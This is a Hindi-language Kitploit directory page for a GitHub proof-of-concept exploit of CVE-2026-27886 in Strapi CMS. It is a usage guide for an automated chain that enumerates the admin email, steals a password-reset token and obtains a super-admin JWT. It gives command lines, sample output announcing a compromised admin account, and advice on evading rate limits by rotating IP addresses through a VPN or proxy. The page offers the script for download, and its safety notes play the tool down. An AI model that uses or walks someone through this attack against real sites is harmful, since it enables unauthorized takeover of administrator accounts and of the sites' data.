Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2026-27886-PoC-Account-Takeover — # CVE-2026-27886 के लिए Strapi CMS में खाता अधिग्रहण का पूर्ण PoC | Kitploit
उपकरण/GitHubGitHub/thesw0rd/cve-2026-27886-poc-account-takeover
टोहीपासवर्ड हमलेभेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणजानकारी एकत्र करनापेनिट्रेशन टेस्टिंग
GitHubthesw0rd/cve-2026-27886-poc-account-takeover

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

CVE-2026-27886-PoC-Account-Takeover

# CVE-2026-27886 के लिए Strapi CMS में खाता अधिग्रहण का पूर्ण PoC

रिपॉजिटरी देखें
233 महीने पहलेअभी तक समीक्षित नहीं

CVE-2026-27886 स्वचालित शोषण - उपयोग गाइड

यह स्क्रिप्ट क्या करती है

4 HTTP अनुरोध समूहों में पूर्ण खाता अधिग्रहण श्रृंखला को स्वचालित करती है:

  1. भेद्यता सत्यापन - पुष्टि करता है कि लक्ष्य भेद्य है
  2. ईमेल गणना - बूलियन ओरेकल के माध्यम से व्यवस्थापक ईमेल निकालता है (~500 अनुरोध)
  3. पासवर्ड रीसेट ट्रिगर - Strapi की पासवर्ड पुनर्प्राप्ति प्रक्रिया आरंभ करता है
  4. टोकन अपहरण - 40-अक्षर का रीसेट टोकन चुराता है (~320 अनुरोध)
  5. खाता अधिग्रहण - सुपर एडमिन JWT प्राप्त करने के लिए चुराए गए टोकन का उपयोग करता है

मूल उपयोग

केवल-सत्यापन मोड (सुरक्षित)

शोषण किए बिना जाँचें कि लक्ष्य भेद्य है या नहीं:

root@kitploit:~
./cve-2026-27886-exploit.py https://target/api/articles --verify-only

पूर्ण शोषण (सबसे तेज़)

यदि आप व्यवस्थापक ईमेल नहीं जानते हैं तो सब कुछ स्वचालित करें:

root@kitploit:~
./cve-2026-27886-exploit.py https://target/api/articles

आउटपुट:

root@kitploit:~
[+] Target: https://target/api/articles
[+] Base URL: https://target
[*] Verifying vulnerability...
    [+] Vulnerable: baseline=12, where_test=0
[*] Enumerating admin email...
    [email protected]
[*] Triggering password reset for [email protected]...
    [+] Password reset triggered (HTTP 204)
[*] Extracting 40-char reset token...
    [100%] d1a2b3c4d5e6f7a8b9c0d1e2f3a4b5c6d7e8f9a
[*] Resetting password with stolen token...
    [+] Password reset successful!
    [+] JWT: eyJhbGciOiJIUzI1NiIs...
    [+] User: [email protected] (ID: 1)

[+] SUCCESS! Admin account compromised.
[+] JWT Token:
eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9...

ईमेल गणना छोड़ें (तेज़)

यदि आप पहले से व्यवस्थापक ईमेल जानते हैं (~500 अनुरोध बचाता है):

root@kitploit:~
./cve-2026-27886-exploit.py https://target/api/articles \
  --email [email protected]

कस्टम पासवर्ड

डिफ़ॉल्ट के बजाय कस्टम पासवर्ड सेट करें:

root@kitploit:~
./cve-2026-27886-exploit.py https://target/api/articles \
  --email [email protected] \
  --password "MyPassword123!"

विलंब जोड़ें (दर सीमा से बचें)

यदि लक्ष्य में दर सीमा है:

root@kitploit:~
./cve-2026-27886-exploit.py https://target/api/articles \
  --delay 0.1

यह प्रत्येक अनुरोध के बीच 100ms जोड़ता है (पूर्ण शोषण के लिए ~2-3 मिनट)।

स्पष्ट बेस URL

यदि /admin/* एंडपॉइंट किसी भिन्न होस्ट पर हैं:

root@kitploit:~
./cve-2026-27886-exploit.py https://api.target/articles \
  --base-url https://admin.target

सामान्य समस्याएँ

"गैर-JSON प्रतिक्रिया"

  • गलत एंडपॉइंट (Strapi Content API संग्रह नहीं)
  • आज़माएँ: https://target/api/products, https://target/api/articles, आदि।

"ईमेल गणना विफल"

  • संग्रह खाली है (कोई updated_by_id विदेशी कुंजी नहीं)
  • व्यवस्थापक भूमिका डेटाबेस में किसी से मेल नहीं खाती
  • यदि कई एंडपॉइंट मौजूद हैं तो भिन्न एंडपॉइंट आज़माएँ

"रीसेट टोकन निकालने में विफल"

  • पासवर्ड रीसेट ट्रिगर नहीं हुआ
  • अनुमानित व्यवस्थापक ईमेल से भिन्न ईमेल
  • टोकन समाप्त हो गया (फिर से प्रयास करें, यह डिफ़ॉल्ट रूप से ~24 घंटे तक रहता है)

दर-सीमित होना

  • --delay 0.05 या अधिक जोड़ें
  • या IP पते घुमाने के लिए VPN/प्रॉक्सी का उपयोग करें

सुरक्षा नोट्स

यह स्क्रिप्ट:

  • ✅ केवल GET/POST अनुरोध करती है (कोई डेटा संशोधन नहीं)
  • ✅ केवल भेद्य Strapi क्वेरी पैरामीटर बाईपास को लक्षित करती है
  • ✅ Strapi के वैध पासवर्ड रीसेट एंडपॉइंट का उपयोग करती है
  • ✅ लक्ष्य पर कोई संग्रहीत कलाकृतियाँ नहीं छोड़ती
  • ⚠️ शोरगुल वाली है - क्रम में 800+ अनुरोध करती है (लॉग में स्पष्ट रूप से दिखाई देता है)
टूल डाउनलोड करें